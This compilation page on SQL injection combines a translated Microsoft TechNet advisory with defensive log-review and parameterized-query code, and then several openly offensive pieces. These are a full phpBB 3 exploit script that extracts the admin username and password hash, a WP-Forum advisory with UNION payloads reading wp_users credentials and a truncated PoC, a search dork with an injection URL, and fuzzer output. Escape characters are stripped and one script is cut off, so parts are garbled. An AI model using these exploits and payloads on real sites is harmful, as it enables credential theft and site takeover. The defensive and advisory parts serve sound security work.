
[Translation] SQL Injection Attack

Date: 2022-08-22 08:07:51


Part 1: [Translation] SQL Injection Attack

Translated by: hackxi (www.hackxi.cn)


Part 2: SQL Injection Attack (From Microsoft TechNet)

网路游侠's blog

An article from TechNet. To be honest, this has all been going around for years, and now it is suddenly being treated like a treasure.

These last few days I have seen this kind of article being pushed in many places, including by HP, Symantec and Microsoft...

Where were they earlier? Even middle-school kids can pick up a tool and scan, or even write injection statements by hand...

I will still add a few notes in places; the article is not written all that perfectly... The annotations (originally in Chinese) are mine.

by 网路游侠 www.youxia.org

(Special thanks to Neil Carpenter for helping out on this blog post)

Recent Trends

Actually, this "recent" trend has been going on for several years now; it has been widespread in China for years, yes, that is when it became "widespread", and abroad it had been popular for a long time already...

Beginning late last year, a number of websites were defaced to include malicious HTML <script> tags in text that was stored in a SQL database and used to generate dynamic web pages. These attacks began to accelerate in the first quarter of and are continuing to affect vulnerable web applications.

The web applications compromised share several commonalities:

Application uses classic ASP code

It is not just ASP injection; PHP and JSP injection are also quite common, and even some EXE files can be injected... Over the top? Yes, but that is how it is!

Application uses a SQL Server database

MySQL, Oracle and DB/2 databases are the same; it is not only SQL Server, seemingly anything whose features are not too poor and that calls itself a "database" will do.

Application code generates dynamic SQL queries based on URI query strings (consoto.com/widgets.asp?widget=sprocket)

This represents a new approach to SQL injection (msdn.microsoft.com/en-us/library/ms161953.aspx). In the past, SQL injection attacks were targeted to specific web applications where the vulnerabilities and the structure of the underlying database were either known or discovered by the attacker. This attack differs because it has been abstracted such that it is possible to attack virtually any vulnerability that is present in an ASP page creating dynamic SQL queries from URI query strings. Additional technical details and a walkthrough of the specifics are available at blogs.technet.com/neilcar/archive/2008/03/15/anatomy-of-a-sql-injection-incident-part-2-meat.aspx.

This attack does not exploit vulnerabilities in Windows, IIS, SQL Server, or other infrastructure code; rather, it exploits vulnerabilities in custom web applications running on this infrastructure. Microsoft has investigated these attacks thoroughly and determined that they are not related to any patched or 0-day vulnerabilities in Microsoft products. More information can be found at blogs.technet.com/msrc/archive/2008/04/25/questions-about-web-server-attacks.aspx.

As indicated above, these attacks have been accelerating through the year. This would appear to be related to at least two factors. First, there is a malicious tool that is in the wild that automates this. SANS discusses that tool here -- isc.sans.org/diary.html?storyid=4294. The tool uses search engines to find vulnerable sites to SQL injection.

The second factor is that one or more malicious bots are now launching SQL injection attacks as a way of spreading the bot further. SecureWorks discusses an example at www.secureworks.com/research/threats/danmecasprox/.

Once a server has been defaced using this attack, it will begin including a malicious <script> tag pointing to a .js file. While the contents of these files differ, they all attempt to exploit various vulnerabilities including already-patched Microsoft vulnerabilities and vulnerable third-party ActiveX controls. Since these scripts are hosted independently, it is possible that the scripts can be changed rapidly to exploit new client vulnerabilities and can be easily tailored to target on a “per browser” basis.

It is not only .js files. SQL injection attacks exploit a flaw in the application itself; once a certain level of privilege is obtained, files get written in: sometimes .js, sometimes an <iframe>, sometimes even .css files, and all of them can be used successfully to drive traffic, to mount further attacks, or to collect zombie machines!

IT/database administrators Recommendations

There are a number of things that IT administrators and database administrators should do to limit risk and respond to possible incidents on the code and infrastructure they manage:

Review IIS logs and database tables for signs of previous exploits

Since this exploit takes place via the URI query string, administrators can review IIS logs to find anomalous queries that may be attempts to exploit this. Information on how to do this manually is available at blogs.technet.com/neilcar/archive/2008/03/15/anatomy-of-a-sql-injection-incident-part-2-meat.aspx. A sample of an automated tool is available at www.codeplex.com/Release/ProjectReleases.aspx?ProjectName=WSUS&ReleaseId=13436.

If IIS logs show that the server has possibly been exploited, the next step would be to inspect tables in databases that are used by the associated web applications, looking for <script> tags appended to cells in text columns.

NOTE: IIS servers should never run in production with logging disabled. While the storage and administration requirements of IIS logging can be significant, the lack of IIS logs makes it very difficult to respond to security incidents.
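To make the IIS log review concrete, here is an added example (not code from the TechNet post) that parses a constructed W3C-format IIS log excerpt and flags query strings carrying the markers a dynamic-SQL tampering attempt leaves: a quote or comment marker, several SQL keywords together, or a <script> tag. The log lines, client addresses and field layout are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C extended log excerpt (not real traffic). The "#Fields:"
# header is the one IIS writes; rows 2, 3 and 6 carry query strings of the
# kind the article tells administrators to look for.
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2008-05-29 10:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2008-05-29 10:01:02 10.0.0.5 GET /widgets.asp widget=sprocket 80 - 192.0.2.10 Mozilla/4.0 200
2008-05-29 10:01:09 10.0.0.5 GET /widgets.asp widget=sprocket%27+OR+1%3D1-- 80 - 198.51.100.7 Mozilla/4.0 500
2008-05-29 10:02:15 10.0.0.5 GET /widgets.asp widget=1%20UNION%20SELECT%20name%20FROM%20widgets 80 - 198.51.100.7 Mozilla/4.0 500
2008-05-29 10:03:30 10.0.0.5 GET /about.asp - 80 - 192.0.2.11 Mozilla/4.0 200
2008-05-29 10:04:01 10.0.0.5 GET /search.asp q=select+a+sprocket 80 - 192.0.2.12 Mozilla/4.0 200
2008-05-29 10:05:12 10.0.0.5 GET /guestbook.asp name=bob%3Cscript%3E 80 - 198.51.100.8 Mozilla/4.0 200
"""

SQL_KEYWORDS = re.compile(r"\b(union|select|insert|update|delete|drop|exec|declare)\b", re.IGNORECASE)
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def parse_w3c_log(text):
    """Yield one dict per request line of an IIS W3C extended log, keyed by the #Fields: names."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        if fields is None:
            continue
        values = line.split(" ")
        # IIS writes '+' for spaces inside a field, so a field-count mismatch means a corrupt row.
        if len(values) != len(fields):
            continue
        yield dict(zip(fields, values))


def query_is_suspicious(raw_query):
    """Return the reasons a cs-uri-query value looks like an injection attempt; [] means clean.

    A lone SQL keyword (a search for the word "select") is not enough on its own;
    it is the combination with a quote, a comment marker or a second keyword
    that points at dynamic-SQL tampering.
    """
    if raw_query in ("", "-"):
        return []
    decoded = unquote_plus(raw_query)
    reasons = []
    if "'" in decoded:
        reasons.append("single quote")
    if "--" in decoded or "/*" in decoded:
        reasons.append("comment marker")
    if ";" in decoded:
        reasons.append("statement separator")
    keywords = {m.lower() for m in SQL_KEYWORDS.findall(decoded)}
    if len(keywords) >= 2:
        reasons.append("multiple SQL keywords")
    if SCRIPT_TAG.search(decoded):
        reasons.append("script tag")
    return reasons


def review_iis_log(text):
    """Return the requests whose query string should be examined, with the decoded query and reasons."""
    findings = []
    for row in parse_w3c_log(text):
        reasons = query_is_suspicious(row.get("cs-uri-query", "-"))
        if reasons:
            findings.append({
                "time": row["date"] + " " + row["time"],
                "c-ip": row["c-ip"],
                "cs-uri-stem": row["cs-uri-stem"],
                "cs-uri-query": unquote_plus(row["cs-uri-query"]),
                "sc-status": row["sc-status"],
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in review_iis_log(SAMPLE_IIS_LOG):
        print(f["time"], f["c-ip"], f["cs-uri-stem"], repr(f["cs-uri-query"]), ", ".join(f["reasons"]))
```

A hit on the same client address across several rows, as with 198.51.100.7 above, is the pattern to carry into the table check that follows.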

If running 3rd party code that uses a database back-end, consult ISV about susceptibility to SQL injection

In cases where 3rd party ASP web applications are being used, administrators should contact the application vendors to ensure that they are not susceptible to SQL injection attacks.

There are many third-party products for preventing SQL injection attacks; many of today's firewalls, IPS devices and dedicated anti-injection firewalls can work quite well. There are also anti-injection scripts that filter directly submitted SQL keywords such as or, and, select, drop, insert and so on, which can be quite effective as a filter; they are usually called directly from a database connection file such as conn.asp, and the effect is obvious. Again, the author is still talking about ASP applications, but in fact almost every language has this problem, because it is a property of the database! PHP and JSP are no exception, and even programs written in C, Pascal, Perl, Python and so on can still be injected, because the problem lies in the program itself; if you wanted to, you could even write a SQL injection example in assembly. A magazine once covered injection into an EXE, and later I tried it myself and successfully crafted a statement to get into an EXE program that required a password.

Validate that the account(s) that are used from the web application have least possible privilege in the database

Administrators should make sure that the SQL users that the web application uses have the least privilege necessary. Web applications should never connect as users with administrative privilege such as "sysadmin" at the server level or "db_owner" at the database level. The white paper "Best practices for setting up and maintaining security in SQL Server 2005" (download.microsoft.com/download/8/5/e/85eea4fa-b3bb-4426-97d0-7f7151b2011c/SQL2005SecBestPract.doc) provides recommendations for various aspects of SQL Server security.

Web developers Recommendations

There are several good documents on how Web developers can prevent SQL injection attacks when writing code. Since these attacks leverage vulnerable web application code, the only way to completely prevent them is to resolve vulnerabilities in the code. Any place that the code dynamically generates a SQL query using data from an external source (and, particularly, from a URI query string) should be considered suspect. Once code vulnerabilities are identified, they need to be carefully resolved.

Explained - SQL Injection, ASP.NET, ADO.NET:

msdn.microsoft.com/en-us/library/bb671351.aspx

Also, the above document contains a pointer to the following article “How To: Protect From SQL Injection in ASP.NET” msdn.microsoft.com/en-us/library/ms998271.aspx (which still applies to ASP)

A very useful video can be found here (this is the video referred to in the previous article, but that link is currently broken): channel9.msdn.com/wiki/default.aspx/SecurityWiki.SQLInjectionLab

Generic information about how SQL Injection works:

msdn.microsoft.com/en-us/library/ms161953.aspx

SQL injections in ASP code (this is different from ASP.NET!):

msdn.microsoft.com/en-us/library/cc676512.aspx

How to call SQL Server stored procedures from ASP:

support.microsoft.com/kb/q164485

The Microsoft Security Development Lifecycle (SDL) has specific guidance to defend against SQL injection. In simple terms there are three different strategies to eradicate SQL Injection attacks:

Using SQL parameterized queries

Using stored procedures

Using SQL execute-only permissions

Michael Howard covers those topics in blogs.msdn.com/sdl/archive/2008/05/15/giving-sql-injection-the-respect-it-deserves.aspx

Also, Writing Secure Code, 2nd edition, has good guidance on how to prevent these types of attacks as well (see pages 399-411).

SQL Injection Mitigation: Using Parameterized Queries (Parts 1 & 2). The advantage of using parameterized queries is that it separates the executable code (i.e., the SELECT statement) from the data (the dynamic information supplied by the application's user). This approach prevents any malicious statements passed along by the user from executing.

Part 1: blogs.technet.com/neilcar/archive/2008/05/21/sql-injection-mitigation-using-parameterized-queries.aspx

Part 2: blogs.technet.com/neilcar/archive/2008/05/23/sql-injection-mitigation-using-parameterized-queries-part-2-types-and-recordsets.aspx
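As an added illustration (not code from the post or from Neil Carpenter's articles), the following puts the concatenated query behind widgets.asp?widget=... next to its parameterized form, and also includes the table scan for appended <script> tags recommended under the IIS-log item above. It uses Python's sqlite3 as a stand-in for the classic ASP/SQL Server stack; the widgets table and its rows are constructed sample data.

```python
import sqlite3


def build_demo_db():
    """In-memory stand-in for the table behind the article's consoto.com/widgets.asp example (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE widgets (name TEXT PRIMARY KEY, description TEXT, internal INTEGER)")
    conn.executemany("INSERT INTO widgets VALUES (?, ?, ?)", [
        ("sprocket", "Standard sprocket", 0),
        ("gear", "Helical gear", 0),
        ("prototype", "Unreleased design", 1),   # internal row the page must never show
    ])
    return conn


def unsafe_lookup(conn, widget):
    """Dynamic SQL built from the URI query-string value: the pattern the article says to treat as suspect."""
    sql = "SELECT name, description FROM widgets WHERE name = '" + widget + "' AND internal = 0"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, widget):
    """Parameterized query: the SELECT text is fixed and the value travels separately, as data."""
    sql = "SELECT name, description FROM widgets WHERE name = ? AND internal = 0"
    return conn.execute(sql, (widget,)).fetchall()


def find_script_tags(conn, table, column):
    """The table check the article recommends after a suspicious log entry:
    rows whose text column has had a <script> tag appended.

    Table and column names come from the administrator's own configuration, never
    from request input; identifiers cannot be bound as parameters, so they are
    the one place string formatting is unavoidable.
    """
    sql = "SELECT rowid, {0} FROM {1} WHERE lower({0}) LIKE '%<script%'".format(column, table)
    return conn.execute(sql).fetchall()


def demo():
    conn = build_demo_db()
    # Constructed tampered value: closes the quoted literal, adds a tautology, comments out the rest.
    tampered = "x' OR 1=1 --"
    results = {
        "unsafe_normal": unsafe_lookup(conn, "sprocket"),
        "safe_normal": safe_lookup(conn, "sprocket"),
        "unsafe_tampered": unsafe_lookup(conn, tampered),   # every row, the internal one included
        "safe_tampered": safe_lookup(conn, tampered),       # no row is literally named that: empty
    }
    # Constructed sample of what a defaced cell looks like after the attack the article describes.
    conn.execute("UPDATE widgets SET description = description || ? WHERE name = 'gear'",
                 ('<script src="x.js"></script>',))
    results["defaced"] = find_script_tags(conn, "widgets", "description")
    return results


if __name__ == "__main__":
    for label, rows in demo().items():
        print(label, rows)
```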

Filtering SQL injection from classic ASP code (or blacklisting keywords): we consider the below a temporary workaround, since in reality it does not fix the root cause of the bugs (i.e. the code is still vulnerable and it might be reachable even after the filtering).

Nazim from the IIS team explains how to do the filtering in detail here: blogs.iis.net/nazim/archive/2008/04/28/filtering-sql-injection-from-classic-asp.aspx

If you are still not sure where to start, all web code that accesses a database, with a particular focus on ASP code and areas of code which use user-supplied data, should be reviewed first.

End User Recommendations

End users should review the information at www.microsoft.com/protect/default.mspx; in addition, here are some specific steps that you can take to protect yourself.

As always, browse responsibly ― but be aware that this could also affect websites that the user trusts

While responsible browsing limits your exposure to vulnerability, it is possible that even websites you trust may have been compromised. Watch for unusual behavior, be aware of the risk, and implement the other recommendations in this section.

Keep up to date on security updates, both Microsoft and 3rd party

Since the malicious scripts are exploiting known vulnerabilities, you should make sure that you are running the latest Microsoft and 3rd party security updates. Microsoft security updates are available via update.microsoft.com. Additional information is available at www.microsoft.com/protect/computer/updates/OS.aspx.

Disable unneeded ActiveX controls and Internet Explorer add-ons

You should disable any unneeded ActiveX controls and add-ons in Internet Explorer. To do this on Windows XP Service Pack 2 or later, follow these steps from KB883256 (support.microsoft.com/kb/883256):

1. Start Internet Explorer.

2. On the Tools menu, click Manage Add-ons.

3. Click the name of the add-on.

4. Use one of the following methods:

• Click Update ActiveX to replace the add-on with the current version. This option is not available for all add-ons.

• To enable an add-on, click Enable, and then click OK.

• To disable an add-on, click Disable, and then click OK.

You may have to restart Internet Explorer for the changes to take effect after you enable or disable an add-on.

For earlier operating systems, follow the instructions in KB154036 (support.microsoft.com/kb/154036).

Take steps to reduce attack surface of 3rd party browsers if you are using them

If you are using an Internet browser other than Internet Explorer, you should ensure that you have installed the latest security updates and that you disable unneeded extensions and add-ons. Information for popular browsers can be found at:

Firefox - support.mozilla.com/en-US/kb/Firefox+Support+Home+Page

Opera - www.opera.com/support/

Safari - www.apple.com/support/safari/

Run up-to-date anti-malware software

End users should ensure that they have anti-virus and anti-spyware software installed and that it is up to date. More information can be found at www.microsoft.com/protect/computer/antivirus/OS.aspx and www.microsoft.com/protect/computer/antispyware/OS.aspx. You can get a 90-day trial copy of Windows Live OneCare anti-virus/anti-spyware software at onecare.live.com/standard/en-us/install/install.htm.

- Security Vulnerability Research & Defense Bloggers

*Postings are provided "AS IS" with no warranties, and confer no rights.*

Published Thursday, May 29, 2008 10:20 PM by swiblog

Filed under: Injection, SQL, Attack

blogs.technet.com/swi/archive/2008/05/29/sql-injection-attack.aspx

I do not feel like adding much further down; what was said above covers most of it.

Injection is a security problem caused by programmers not filtering strictly enough when writing their code.

It has nothing to do with the language, and nothing to do with the type of database.

The best defense is to find a programmer with good security awareness.

When writing code, do not chase features one-sidedly, because functionality is always inversely proportional to security.

If possible, buy the relevant software or hardware products for protection.

Of course, secure configuration is also quite important.

If you do get compromised, it at least prevents privileges from being escalated further.

If you want to check whether your own site has this problem too,

you can try the following tools:

NBSI, 啊D注入工具 (Ah-D injection tool), 明小子's Domain, CASI injector, HDSI

Newer versions of X-Scan also work.

Commercial ones include WebRavor, SSS, 榕基 RJ-iTop, 绿盟极光, Venus 天镜.

Part 3: phpBB 3.0 SQL Injection

#!/usr/bin/php -q -d short_open_tag=on
echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosuren";
echo "by rgod rgod@autistici.orgn";
echo "site: retrogod.altervista.orgn";
echo "dork, version specific: "Powered by phpBB * , phpBB Group"nn";
/*
works regardless of php.ini settings
you need a global moderator account with "simple moderator" role
*/
if ($argc<5) {
echo "Usage: php ".$argv[0]." host path user pass OPTIONSn";
echo "host: target server (ip/hostname)n";
echo "path: path to phpbb3n";
echo "user/pass: u need a valid user account with global moderator rightsn";
echo "Options:n";
echo " -T[prefix] specify a table prefix different from default (phpbb_)n";
echo " -p[port]: specify a port other than 80n";
echo " -P[ip:port]: specify a proxyn";
echo " -u[number]: specify a user id other than 2 (admin)n";
echo " -x: disclose table prefix through error messagesn";
echo "Example:rn";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-urn";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7n";
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="rn"; $exa.="rn";}
}
return $exa."rn".$result;
}

$proxy_regex = '(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)';

function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...rn";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "rn".$html;
}

$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];
$port=80;
$prefix="PHPBB_";
$user_id="2";//admin
$discl=0;
$proxy="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
$prefix=str_replace("-T","",$argv[$i]);
}
if ($temp=="-u")
{
$user_id=str_replace("-u","",$argv[$i]);
}
if ($temp=="-x")
{
$discl=1;
}
}
if (($path[0]'/') or ($path[strlen($path)-1]'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p=''.$host.':'.$port.$path;}

$data="username=".urlencode($user);
$data.="&password=".urlencode($pass);
$data.="&redirect=index.php";
$data.="&login=Login";
$packet="POST ".$p."ucp.php?mode=login HTTP/1.0rn";
$packet.="Referer: $host$path/ucp.php?mode=loginrn";
$packet.="Content-Type: application/x-www-form-urlencodedrn";
$packet.="Accept-Encoding: text/plainrn";
$packet.="Host: ".$host."rn";
$packet.="Content-Length: ".strlen($data)."rn";
$packet.="Connection: Closernrn";
$packet.=$data;
sendpacketii($packet);
$cookie="";
$temp=explode("Set-Cookie: ",$html);
for ($i=1; $i<=count($temp)-1; $i++)
{
$temp2=explode(" ",$temp[$i]);
$cookie.=" ".$temp2[0];
}
if (eregi("_u=1;",$cookie))
{
//echo $html."n";//debug
//die("Unable to login...");
}
echo "cookie -> ".$cookie."rn";

if ($discl)
{
$sql="'suntzuuuuu";
echo "sql -> ".$sql."n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0rn";
$packet.="Content-Type: application/x-www-form-urlencodedrn";
$packet.="Host: ".$host."rn";
$packet.="Content-Length: ".strlen($data)."rn";
$packet.="Connection: Closern";
$packet.="Cookie: ".$cookie." rnrn";
$packet.=$data;
sendpacketii($packet);
if (strstr($html,"You have an error in your SQL syntax"))
{
$temp=explode("posts",$html);
$temp2=explode(" ",$temp[0]);
$prefix=strtoupper($temp2[count($temp2)-1]);
echo "prefix -> ".$prefix."n";sleep(2);
}
}

$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$md5s))
{
$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
echo "sql -> ".$sql."n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0rn";
$packet.="Content-Type: application/x-www-form-urlencodedrn";
$packet.="Host: ".$host."rn";
$packet.="Content-Length: ".strlen($data)."rn";
$packet.="Connection: Closern";
$packet.="Cookie: ".$cookie." rnrn";
$packet.=$data;
sendpacketii($packet);
if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]rn";sleep(2);break;}
}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}

$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
echo "sql -> ".$sql."n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0rn";
$packet.="Content-Type: application/x-www-form-urlencodedrn";
$packet.="Host: ".$host."rn";
$packet.="Content-Length: ".strlen($data)."rn";
$packet.="Connection: Closern";
$packet.="Cookie: ".$cookie." rnrn";
$packet.=$data;
sendpacketii($packet);
if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]rn";sleep(2);break;}
}
if ($i==255) {die("Exploit failed...");}
$j++;
}

echo "--------------------------------------------------------------------rn";
echo "admin -> ".$admin."rn";
echo "password (md5) -> ".$password."rn";
echo "--------------------------------------------------------------------rn";

function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}
if (is_hash($password)) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?>

Part 4: WPForum <= 2.3 SQL Injection

=============================================

INTERNET SECURITY AUDITORS ALERT -010

- Original release date: September 28th, 2009

- Last revised: December 15th, 2009

- Discovered by: Juan Galiana Lara

- CVE ID: CVE-2009-3703

- Severity: 8.5/10 (CVSS Base Score)

=============================================

I. VULNERABILITY

-------------------------

WP-Forum <= 2.3 SQL Injection & Blind SQL Injection vulnerabilities

II. BACKGROUND

-------------------------

WP-Forum is a discussion forum plugin for WordPress. It works with WordPress version 2+ and PHP >= 5.0.

III. DESCRIPTION

-------------------------

WP-Forum fails to sanitize user-supplied input and is vulnerable to SQL Injection and Blind SQL Injection. An attacker can obtain any data from the database, including user logins and passwords of the WordPress installation, allowing him to obtain access to the application and gain administration privileges.

For the SQL Injection vulnerability, it is possible to concatenate other SQL requests via a "union select" statement. The parameters "search_max" and "forum" are affected by this flaw.

Snippet of vulnerable code:

In wpf.class file:

1836    $option_max_days = $_POST[search_max];      // <- this line is not being sanitized
1837    $option_forums = $_POST[forum];
1838    if(!$option_max_days)
1839             $option_max_days = 9999;
1840    $op .= " AND $this->t_posts.`date` > SUBDATE(CURDATE(), INTERVAL $option_max_days DAY) ";
1841
...
1850    foreach((array)$option_forums as $f)
1851            $a .= $f.",";   // <- this line is not being sanitized
1852
1853    $a = substr($a, 0, strlen($a)-1 );
1854    if(!$a)
1855            $w = "";
1856    else
1857            $w = "IN($a)";
1858
1859    $sql = "SELECT $this->t_threads.parent_id as pt, $this->t_posts.id, text, $this->t_posts.subject, $this->t_posts.parent_id, $this->t_posts.`date`, MATCH ($what) AGAINST ($search_string) AS score
1860    FROM $this->t_posts inner join $this->t_threads on $this->t_posts.parent_id = $this->t_threads.id
1861    WHERE $this->t_threads.parent_id $w
1862    AND MATCH (text) AGAINST ($search_string) $op";

In the case of the Blind SQL Injection, the vulnerable code is...

In wpf-post.php file:

57    $id = $_GET[id]; // <- $_GET[id] is directly assigned
58    $thread = $this->check_parms($_GET[t]);
59
60            $out .= $this->header();
61
62    $post = $wpdb->get_row("SELECT * FROM $wpforum->t_posts WHERE id = $id"); // <- id is used without clean up

Another example:

1490    function remove_post(){
1491            global $user_level, $user_ID, $wpdb;
1492            $id = $_GET[id]; // <- $_GET[id] is directly assigned
1493            $author = $wpdb->get_var("SELECT author_id from $this->t_posts where id = $id"); // id is used without clean up
...
1503            if($del == "ok"){
1504                $wpdb->query("DELETE FROM $this->t_posts WHERE id = $id"); // <- id is used without clean up
1505                $this->o .= "".__("Post deleted", "wpforum")."";
1506            }
1507            else
1508                wp_die(__("Cheating, are we?", "wpforum"));
1509
1510    }

The "id" parameter is vulnerable in other parts of the source code as well.

It is also possible to delete all records in the $this->t_posts and $this->t_threads tables, because $_GET[topic] is not properly sanitized, by injecting something like 1 or 1=1:

1479    function remove_topic(){
1480            global $user_level, $user_ID, $wpdb;
1481            $topic = $_GET[topic];
1482            if($this->is_moderator($user_ID, $this->current_forum)){
1483                $wpdb->query("DELETE FROM $this->t_posts WHERE parent_id = $topic");
1484                $wpdb->query("DELETE FROM $this->t_threads WHERE id = $topic");
1485            }
1486            else
1487                wp_die(__("Cheating, are we?", "wpforum"));
1488
1489    }

IV. PROOF OF CONCEPT

-------------------------

In the URL example.com/blog/?page_id=3&wpforumaction=search (replacing the page_id=3 parameter with the number of the WP-Forum page in each case) it is possible to obtain any data from the database. Here is a proof of concept to obtain user_pass, user_login and user_email of the user with id=1 of the wp_users table (normally admin).

We have to fill the search_max parameter with the value:

9999 DAY) union select 1,1,1,user_pass,1,1,1 from wp_users where id=1 and subdate(curdate(), interval 9999

9999 DAY) union select 1,1,1,user_login,1,1,1 from wp_users where id=1 and subdate(curdate(), interval 9999

9999 DAY) union select 1,1,1,user_email,1,1,1 from wp_users where id=1 and subdate(curdate(), interval 9999

I wrote a PoC to automatically get the password hash of the WordPress admin account:

user@linuz:~$ cat wpforum2.3-poc.py
#!/usr/bin/python
# WP-Forum <= 2.3 SQL Injection PoC
# Juan Galiana Lara
# Internet Security Auditors
import urllib
import urllib2
import re
url = 'site//wordpress/?page_id=3&wpforumaction=search'
values = {'search_words' : 'any',
'search_submit' : 'Search',
'search_max' : '999 DAY) union select 1,1,1,user_pass,1,1,1 from wp_users where id=1 or SUBDATE(CURDATE(), INTERVAL 9999' }
data = urllib.urlenco

Part 5: Blue Dove Sql Injection Vulnerability

google  : powered by Blue Dove Web Design

Exploit :server/path/file.php?id=null[SQL]

Example:

server/sections/newsletter.php?Id=-30%20union%20select%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14

Part 6: SQL Injection Encoding Attacks fuzzer.php

My test results (the code follows the results):



[181] => 2

[182] => 2

[183] => 2

[184] => 2

[185] => 2

[186] => 2

[187] => 2

[188] => 2

[189] => 2

[190] => 2

[191] => 2

[192] => 2

[193] => 2

[194] => 2

[195] => 2

[196] => 2

[197] => 2

[198] => 2

[199] => 2

[200] => 2

[201] => 2

[202] => 2

[203] => 2

[204] => 2

[205] => 2

[206] => 2

[207] => 2

[208] => 2

[209] => 2

[210] => 2

[211] => 2

[212] => 2

[213] => 2

[214] => 2

[215] => 2

[216] => 2

[217] => 2

[218] => 2

[219] => 2

[220] => 2

[221] => 2

[222] => 2

[223] => 2

[224] => 2

[225] => 2

[226] => 2

[227] => 2

[228] => 2

[229] => 2

[230] => 2

